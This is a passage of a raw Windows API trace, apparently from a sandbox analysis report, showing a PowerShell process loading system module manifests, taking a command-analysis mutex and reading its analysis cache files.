(hFile=0x9d8) returned 0x1 [0282.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.424] GetFileType (hFile=0x9d8) returned 0x1 [0282.424] ReadFile (in: hFile=0x9d8, lpBuffer=0x25b5c79ab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c79ab18*, lpNumberOfBytesRead=0x653ef8d338*=0x1000, lpOverlapped=0x0) returned 1 [0282.426] ReadFile (in: hFile=0x9d8, lpBuffer=0x25b5c79c919, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x653ef8cf68, lpOverlapped=0x0 | out: lpBuffer=0x25b5c79c919*, lpNumberOfBytesRead=0x653ef8cf68*=0xc, lpOverlapped=0x0) returned 1 [0282.426] ReadFile (in: hFile=0x9d8, lpBuffer=0x25b5c79ab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d008, lpOverlapped=0x0 | out: lpBuffer=0x25b5c79ab18*, lpNumberOfBytesRead=0x653ef8d008*=0x395, lpOverlapped=0x0) returned 1 [0282.427] ReadFile (in: hFile=0x9d8, lpBuffer=0x25b5c79ab18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c79ab18*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.427] CloseHandle (hObject=0x9d8) returned 1 [0282.427] ReleaseMutex (hMutex=0x9d4) returned 1 [0282.427] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", lpFilePart=0x0) returned 0x4b [0282.427] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d01020 [0282.427] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d01020, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.427] CoTaskMemFree (pv=0x25b73d01020) [0282.427] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfe7c0 [0282.427] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfe7c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.427] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.427] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.427] GetCurrentProcess () returned 0xffffffffffffffff [0282.427] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9d8) returned 1 [0282.428] GetTokenInformation (in: TokenHandle=0x9d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.428] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739847b0 [0282.428] GetTokenInformation (in: TokenHandle=0x9d8, TokenInformationClass=0x1, TokenInformation=0x25b739847b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739847b0, ReturnLength=0x653ef8d6b8) returned 1 [0282.429] LocalFree (hMem=0x25b739847b0) returned 0x0 [0282.429] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7a2800, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7a2800*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.429] CreateMutexW (lpMutexAttributes=0x25b5c7a2950, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9dc [0282.429] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9dc, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.429] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d00e00 [0282.430] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d00e00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.430] CoTaskMemFree (pv=0x25b73d00e00) [0282.430] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1", lpFilePart=0x0) returned 0x4b [0282.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.430] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DnsClient\\DnsClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dnsclient\\dnsclient.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7a2fa0 | out: lpFileInformation=0x25b5c7a2fa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e0cb82, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x10e0cb82, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x10e0cb82, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d)) returned 1 [0282.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.430] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.430] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.430] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.430] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_c9322d86-871f-44d4-b62e-baafb381b7ca", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_c9322d86-871f-44d4-b62e-baafb381b7ca", lpFilePart=0x0) returned 0x93 [0282.430] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.430] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_c9322d86-871f-44d4-b62e-baafb381b7ca" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_c9322d86-871f-44d4-b62e-baafb381b7ca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9e0 [0282.431] GetFileType (hFile=0x9e0) returned 0x1 [0282.431] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.431] GetFileType (hFile=0x9e0) returned 0x1 [0282.432] ReadFile (in: hFile=0x9e0, lpBuffer=0x25b5c7a4228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7a4228*, lpNumberOfBytesRead=0x653ef8d338*=0x904, lpOverlapped=0x0) returned 1 [0282.434] ReadFile (in: hFile=0x9e0, lpBuffer=0x25b5c7a4228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7a4228*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.434] CloseHandle (hObject=0x9e0) returned 1 [0282.434] ReleaseMutex (hMutex=0x9dc) returned 1 [0282.434] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", lpFilePart=0x0) returned 0x65 [0282.434] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0282.434] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.434] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.434] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfe7c0 [0282.434] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfe7c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.434] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.434] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.435] GetCurrentProcess () returned 0xffffffffffffffff [0282.435] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9e0) returned 1 [0282.435] GetTokenInformation (in: TokenHandle=0x9e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.435] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984330 [0282.435] GetTokenInformation (in: TokenHandle=0x9e0, TokenInformationClass=0x1, TokenInformation=0x25b73984330, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984330, ReturnLength=0x653ef8d6b8) returned 1 [0282.435] LocalFree (hMem=0x25b73984330) returned 0x0 [0282.435] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7a95c0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7a95c0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.436] CreateMutexW (lpMutexAttributes=0x25b5c7a9710, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9e4 [0282.436] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9e4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.436] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d00e00 [0282.436] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d00e00, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.436] CoTaskMemFree (pv=0x25b73d00e00) [0282.436] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", lpFilePart=0x0) returned 0x65 [0282.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.436] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7a9d90 | out: lpFileInformation=0x25b5c7a9d90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc)) returned 1 [0282.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.436] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.437] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_bfab4979-bef8-4b3c-b045-b99868024702", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_bfab4979-bef8-4b3c-b045-b99868024702", lpFilePart=0x0) returned 0x93 [0282.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.437] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_bfab4979-bef8-4b3c-b045-b99868024702" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_bfab4979-bef8-4b3c-b045-b99868024702"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9e8 [0282.437] GetFileType (hFile=0x9e8) returned 0x1 [0282.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.437] GetFileType (hFile=0x9e8) returned 0x1 [0282.438] ReadFile (in: hFile=0x9e8, lpBuffer=0x25b5c7ab068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7ab068*, lpNumberOfBytesRead=0x653ef8d338*=0x7be, lpOverlapped=0x0) returned 1 [0282.440] ReadFile (in: hFile=0x9e8, lpBuffer=0x25b5c7ab068, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7ab068*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.440] CloseHandle (hObject=0x9e8) returned 1 [0282.440] ReleaseMutex (hMutex=0x9e4) returned 1 [0282.440] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1", lpFilePart=0x0) returned 0x53 [0282.440] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb900 [0282.440] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb900, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.440] CoTaskMemFree (pv=0x25b73cfb900) [0282.440] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cff8c0 [0282.440] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cff8c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.440] CoTaskMemFree (pv=0x25b73cff8c0) [0282.440] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.440] GetCurrentProcess () returned 0xffffffffffffffff [0282.440] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9e8) returned 1 [0282.440] GetTokenInformation (in: TokenHandle=0x9e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.441] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984430 [0282.441] GetTokenInformation (in: TokenHandle=0x9e8, TokenInformationClass=0x1, TokenInformation=0x25b73984430, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984430, ReturnLength=0x653ef8d6b8) returned 1 [0282.441] LocalFree (hMem=0x25b73984430) returned 0x0 [0282.441] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7b00e0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7b00e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.441] CreateMutexW (lpMutexAttributes=0x25b5c7b0230, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9ec [0282.442] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9ec, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.442] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d02120 [0282.442] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d02120, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.442] CoTaskMemFree (pv=0x25b73d02120) [0282.442] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1", lpFilePart=0x0) returned 0x53 [0282.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.442] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7b0890 | out: lpFileInformation=0x25b5c7b0890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397)) returned 1 [0282.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.442] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.442] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.443] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_078aaa97-7fa8-45e4-8147-959a1d3ac0b5", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_078aaa97-7fa8-45e4-8147-959a1d3ac0b5", lpFilePart=0x0) returned 0x93 [0282.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.443] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_078aaa97-7fa8-45e4-8147-959a1d3ac0b5" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_078aaa97-7fa8-45e4-8147-959a1d3ac0b5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9f0 [0282.443] GetFileType (hFile=0x9f0) returned 0x1 [0282.443] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.443] GetFileType (hFile=0x9f0) returned 0x1 [0282.444] ReadFile (in: hFile=0x9f0, lpBuffer=0x25b5c7b1b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7b1b30*, lpNumberOfBytesRead=0x653ef8d338*=0x9b1, lpOverlapped=0x0) returned 1 [0282.446] ReadFile (in: hFile=0x9f0, lpBuffer=0x25b5c7b1b30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7b1b30*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.446] CloseHandle (hObject=0x9f0) returned 1 [0282.446] ReleaseMutex (hMutex=0x9ec) returned 1 [0282.446] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", lpFilePart=0x0) returned 0x43 [0282.446] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa3c0 [0282.446] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa3c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.446] CoTaskMemFree (pv=0x25b73cfa3c0) [0282.447] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfac40 [0282.447] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfac40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.447] CoTaskMemFree (pv=0x25b73cfac40) [0282.447] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.447] GetCurrentProcess () returned 0xffffffffffffffff [0282.447] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9f0) returned 1 [0282.447] GetTokenInformation (in: TokenHandle=0x9f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.447] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984c30 [0282.447] GetTokenInformation (in: TokenHandle=0x9f0, TokenInformationClass=0x1, TokenInformation=0x25b73984c30, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984c30, ReturnLength=0x653ef8d6b8) returned 1 [0282.448] LocalFree (hMem=0x25b73984c30) returned 0x0 [0282.448] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c7b73f0, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c7b73f0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.448] CreateMutexW (lpMutexAttributes=0x25b5c7b7540, bInitialOwner=0, 